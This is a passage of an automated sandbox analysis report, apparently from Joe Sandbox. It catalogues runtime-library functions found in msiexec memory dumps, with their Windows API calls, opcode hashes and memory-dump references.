                                                                                                                                                                                                                                • API ID: ExceptionRaise___std_exception_copy
                                                                                                                                                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                • API String ID: 3109751735-1866435925
                                                                                                                                                                                                                                • Opcode ID: da0f29f91ce7073f4ba66a66e15e4e623e7343c4a85c381b8da4168cde78af2d
                                                                                                                                                                                                                                • Instruction ID: 2615dd9a30c9155a3de52a843cc8e6b35b4df61972a0884ea36886d285387d30
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: da0f29f91ce7073f4ba66a66e15e4e623e7343c4a85c381b8da4168cde78af2d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EA11E4B69007486FC7D0EE68CD41B96B3E8AF55210F14892AF968E7680F770EA14CFD1
                                                                                                                                                                                                                                Function 0618C6B2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,0618C663,00000000,?,E8B440B6,?,?,?,0618C78D,00000002,FlsGetValue,061A2BD0,FlsGetValue), ref: 0618C6BF
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,0618C663,00000000,?,E8B440B6,?,?,?,0618C78D,00000002,FlsGetValue,061A2BD0,FlsGetValue,00000000,?,0618B61D), ref: 0618C6C9
                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000000,00000000,?,0618B61D,?,?,?,?,?,?), ref: 0618C6F1
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                                • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                • Opcode ID: 90738a6b4356a9cbcc55c976aa61989e936ab78040e3cb9844ec4ea1f9c2ae3c
                                                                                                                                                                                                                                • Instruction ID: 7eebc3054a8cebfa18326d7381d83ce2c8d5bdf50e3baf75796019271a44934d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 90738a6b4356a9cbcc55c976aa61989e936ab78040e3cb9844ec4ea1f9c2ae3c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58E01A34A90246BBEF502B61ED06B693A55AB00A80F648030FA0CE8191DBA1E5A0C9E4
                                                                                                                                                                                                                                Function 061930BB Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetConsoleOutputCP.KERNEL32(E8B440B6,00000000,00000000,00000000), ref: 0619311E
                                                                                                                                                                                                                                  • Part of subcall function 0619805B: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,06196F10,?,00000000,-00000008), ref: 061980BC
                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 06193370
                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 061933B6
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 06193459
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2112829910-0
                                                                                                                                                                                                                                • Opcode ID: 7e64a02a9aa105d47e7e7418e8354daeb01de3adae16d96c5f58607ae60c9ce6
                                                                                                                                                                                                                                • Instruction ID: 4cd8664b20639445264bb5557aa52a91b5f6745124c145f9e35affac7631beef
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e64a02a9aa105d47e7e7418e8354daeb01de3adae16d96c5f58607ae60c9ce6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D7D18875E00258AFCF55CFA8D8809EDBBB5FF49304F28452AE966EB251D730A941CF60
                                                                                                                                                                                                                                Function 0618B681 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AdjustPointer
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1740715915-0
                                                                                                                                                                                                                                • Opcode ID: 3c74f1c7002b6189650c18a89d72104689553b87e88bc6c82e8241a569955881
                                                                                                                                                                                                                                • Instruction ID: e5b07641f6280e1d39c05de0514e72e1463b9a3f332f2b80683843ccbe289759
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c74f1c7002b6189650c18a89d72104689553b87e88bc6c82e8241a569955881
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A151E176A09306AFEBA8AF54D840BBA77A4FF84310F25452DED21876D0E731E840CF90
                                                                                                                                                                                                                                Function 0619831C Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 0619805B: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,06196F10,?,00000000,-00000008), ref: 061980BC
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 06198380
                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 06198387
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 061983C1
                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 061983C8
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1913693674-0
                                                                                                                                                                                                                                • Opcode ID: 853415dbc4f90a0ec36ffbec328db71426808492c6dbaef2e655b83ee3c5e7b4
                                                                                                                                                                                                                                • Instruction ID: 3275ed87603c2cee33f07f76e53db5fd30c84b1834aa6401968bdba3957447fb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 853415dbc4f90a0ec36ffbec328db71426808492c6dbaef2e655b83ee3c5e7b4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B217F71A00605AFDFE0EF768C8096BB7A9FF862647018D19E929D7540D770ED518BB0
                                                                                                                                                                                                                                Function 0618F11D Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 49607edead6456ea0daf572c22bd0541f5f70ce2b9e0fb3f0c9b31f6e262bb5d
                                                                                                                                                                                                                                • Instruction ID: 977ad364ac8442c3cf6abbf6d691ad3c2df6e2315479683d2676ca9d43b422dc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49607edead6456ea0daf572c22bd0541f5f70ce2b9e0fb3f0c9b31f6e262bb5d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B214DB1A00216AFDBE4BF71DC8096A77B9EF842A4B114925F925D7590DB30EC52CFA0
                                                                                                                                                                                                                                Function 061992BD Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 061992C5
                                                                                                                                                                                                                                  • Part of subcall function 0619805B: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,06196F10,?,00000000,-00000008), ref: 061980BC
                                                                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 061992FD
                                                                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0619931D
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 158306478-0
                                                                                                                                                                                                                                • Opcode ID: f317fdfaf3399a270db65de2cb2201af0185c9681ceb27f5f1014ba35ad14692
                                                                                                                                                                                                                                • Instruction ID: 5b342d5196faace4761348d6238af69889fbd634cfdec2e68bf7d5180918afae
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f317fdfaf3399a270db65de2cb2201af0185c9681ceb27f5f1014ba35ad14692
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C1126B6D015197EAFE16B765C89CBF3EADDFC91A47090C29FA1AE1140EB30DE4081B1
                                                                                                                                                                                                                                Function 0619DD7D Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0619C2B6,00000000,00000001,0000000C,00000000,?,061934AD,00000000,00000000,00000000), ref: 0619DD94
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,0619C2B6,00000000,00000001,0000000C,00000000,?,061934AD,00000000,00000000,00000000,00000000,00000000,?,06193A87,?), ref: 0619DDA0
                                                                                                                                                                                                                                  • Part of subcall function 0619DD66: CloseHandle.KERNEL32(FFFFFFFE,0619DDB0,?,0619C2B6,00000000,00000001,0000000C,00000000,?,061934AD,00000000,00000000,00000000,00000000,00000000), ref: 0619DD76
                                                                                                                                                                                                                                • ___initconout.LIBCMT ref: 0619DDB0
                                                                                                                                                                                                                                  • Part of subcall function 0619DD28: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0619DD57,0619C2A3,00000000,?,061934AD,00000000,00000000,00000000,00000000), ref: 0619DD3B
                                                                                                                                                                                                                                • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0619C2B6,00000000,00000001,0000000C,00000000,?,061934AD,00000000,00000000,00000000,00000000), ref: 0619DDC5
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2744216297-0
                                                                                                                                                                                                                                • Opcode ID: cc19e7e4d938955f08a4ac8ef4ccd4685e6cdc97ad2efdf39538c8047a9f2488
                                                                                                                                                                                                                                • Instruction ID: fdad4cfe7fb318716295180107828dff427d9982d73000b47ed03a659588616f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc19e7e4d938955f08a4ac8ef4ccd4685e6cdc97ad2efdf39538c8047a9f2488
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8F0AC36900558BBCF622F95ED059993FA6EF492B1F054110FF19D5260D7328960EBA1
                                                                                                                                                                                                                                Function 06182530 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 157COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___std_exception_copy.LIBVCRUNTIME ref: 061826BF
                                                                                                                                                                                                                                  • Part of subcall function 06189540: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,E8B440B6,?,?,0618743C,?,061A9F00,?), ref: 061895A0
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionRaise___std_exception_copy
                                                                                                                                                                                                                                • String ID: ios_base::badbit set$ios_base::failbit set
                                                                                                                                                                                                                                • API String ID: 3109751735-1240500531
                                                                                                                                                                                                                                • Opcode ID: f4ad472a6ed445e195fd0547559796d930ca6b7d0ebaf8aa9c9cf6028630c969
                                                                                                                                                                                                                                • Instruction ID: d805250dc91c998115de4bc2c31ef067d7ac7fdff69d2579996d17956cd5ceb6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f4ad472a6ed445e195fd0547559796d930ca6b7d0ebaf8aa9c9cf6028630c969
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3151D6B5D10308AFC754EF68CD41BAAB7F9EF45210F14861AF924A7640E730AA04CFE1
                                                                                                                                                                                                                                Function 0618B370 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 0618B3AF
                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 0618B463
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                • API String ID: 3480331319-1018135373
                                                                                                                                                                                                                                • Opcode ID: 7519103079804b46deacbd86b8c6fbd70a7894f50030597a0c3924bf563b8259
                                                                                                                                                                                                                                • Instruction ID: cdd4c4bf5c72b7d72a4f2211821e03fef1f2393407ba3e77d23269353ac2c014
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7519103079804b46deacbd86b8c6fbd70a7894f50030597a0c3924bf563b8259
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5041E334E05208AFCF90EF68D880AAEBBB5AF85314F148055ED259B351D731EA12CFD1
                                                                                                                                                                                                                                Function 0618BC7D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • EncodePointer.KERNEL32(00000000,?), ref: 0618BCA2
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: EncodePointer
                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                • Opcode ID: cebd1927f9146fdde90e55d8be315c14a3a9a344a77391910a21ef199fa61262
                                                                                                                                                                                                                                • Instruction ID: ed4fd0cc8415be7e6c0a32f8fcd958c87debd9ff92a05fa6eb6d8396d9db780f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cebd1927f9146fdde90e55d8be315c14a3a9a344a77391910a21ef199fa61262
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19413772904209AFCF95EF98CD80AAEBBB6BF48314F188159F914A7211D3359950DF50
                                                                                                                                                                                                                                Function 0030EC9C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MetricsSystem
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                • Opcode ID: d1e327ded89b7fc9d18839549c8ac65226acb75919138ad1fe267fa6186b8ead
                                                                                                                                                                                                                                • Instruction ID: 8f2ce6401050451b4e2db6871b238554fe5054ce5cd563a23187ea611c9962f1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1e327ded89b7fc9d18839549c8ac65226acb75919138ad1fe267fa6186b8ead
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE3181B09183418FD751EF68E98565ABBF4BF88304F01892EE4D8C7265D774A958CB83
                                                                                                                                                                                                                                Function 002EDD8D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 002EDD93
                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 002EDE2D
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DirectorySystem
                                                                                                                                                                                                                                • String ID: C6
                                                                                                                                                                                                                                • API String ID: 2188284642-129923243
                                                                                                                                                                                                                                • Opcode ID: b5a9acc209e79ea827d588fe5523abc93e918f9d587913178f0ea9e34c1aa8a7
                                                                                                                                                                                                                                • Instruction ID: c8cb17bb662d3df32732a63ba1dd72e703bd0f512a3c8b2cff50cbbb97831ba2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b5a9acc209e79ea827d588fe5523abc93e918f9d587913178f0ea9e34c1aa8a7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D119EF54642C25BD73ACF119CD687E7269EF56308F88082EF892C66A2D3315C65C623
                                                                                                                                                                                                                                Function 06181B60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 06181B65
                                                                                                                                                                                                                                  • Part of subcall function 0618741D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 06187429
                                                                                                                                                                                                                                • ___std_exception_copy.LIBVCRUNTIME ref: 06181B8E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Xinvalid_argument___std_exception_copystd::_std::invalid_argument::invalid_argument
                                                                                                                                                                                                                                • String ID: string too long
                                                                                                                                                                                                                                • API String ID: 1846318660-2556327735
                                                                                                                                                                                                                                • Opcode ID: f24d1ae00189e6b09db2d4e004e1459bc1d50a5556b843e4c2dffed39cc941e9
                                                                                                                                                                                                                                • Instruction ID: 9a68b2b406cbc3be0d1e3b01e8bc2dae81f5f91d8a7392b0d1e46fe811c818c4
